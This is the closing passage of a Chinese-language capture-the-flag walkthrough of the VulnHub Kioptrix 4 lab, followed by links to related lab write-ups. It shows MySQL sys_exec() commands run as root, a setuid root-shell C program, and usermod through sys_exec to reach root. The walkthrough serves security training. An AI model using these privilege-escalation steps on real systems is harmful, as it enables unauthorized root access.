| NULL                                                | 
+-----------------------------------------------------+
1 row in set (0.00 sec)
 
mysql> quit
Bye
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)
</pre><p>這樣就將<code>sys_exec()</code>函數執行的結果寫入到了<code>/tmp/out</code>下。</p><p>得知能夠獲得root權限。</p><p>能夠寫一個c語言程序進行命令執行</p><pre class="md-fences mock-cm md-end-block" lang="">#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system(「/bin/bash」);
}
</pre><p>本地編譯上傳到目標靶機。</p><p>這裏我用wget下載好像一下鏈接超時。多是防火牆阻止流量。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> SELECT sys_exec('usermod -a -G admin');
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.07 sec)
 
</pre><p>利用<code>SELECT sys_exec('usermod -a -G admin');</code>將<code>john</code>加入管理員組</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:/tmp$ sudo su
[sudo] password for john: 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
</pre><p>這樣咱們獲得了root權限。</p></div>
</body>
</html>
1. vulnhub靶場之sunset:dusk
2. vulnhub靶場之EVM
3. VulnHub靶場之AI Web 2.0
4. VulnHub測試靶場DC-1
5. Vulnhub靶場第一關
6. Vulnhub靶場第三關
7. VulnHub靶場系列-Tr0ll2
8. VulnHub***測試靶場Breach 1.0
9. Vulnhub靶場第四關
10. Vulnhub----bulldog靶場筆記
更多相關文章...
• Markdown 標題 - Markdown 教程
• jQuery Mobile 主題 - jQuery Mobile 教程
• PHP Ajax 跨域問題最佳解決方案
• IntelliJ IDEA中SpringBoot properties文件不能自動提示問題解決
相關標籤/搜索
每日一句
每一个你不满意的现在，都有一个你没有努力的曾经。